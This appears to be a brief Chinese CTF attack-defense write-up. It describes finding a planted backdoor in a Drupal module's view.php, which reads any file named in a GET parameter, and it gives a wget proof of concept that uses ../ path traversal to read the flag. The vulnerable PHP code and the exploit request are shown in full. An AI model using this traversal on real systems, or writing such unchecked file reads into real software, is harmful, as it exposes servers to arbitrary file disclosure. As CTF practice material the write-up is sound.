不得不说AWD对WEB狗越来越不友好了

Down下网站源码后上Seay源代码审计工具直接自动审计一波

发现预留后门

路径/sites/all/modules/avatar_uploader/lib/demo/view.php

<?php

$file = $_GET['file'];

echo file_get_contents("uploadDir/$file");
exit;

直接构造POC:wget http://ip:5072/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../flag
即可获取目标机上flag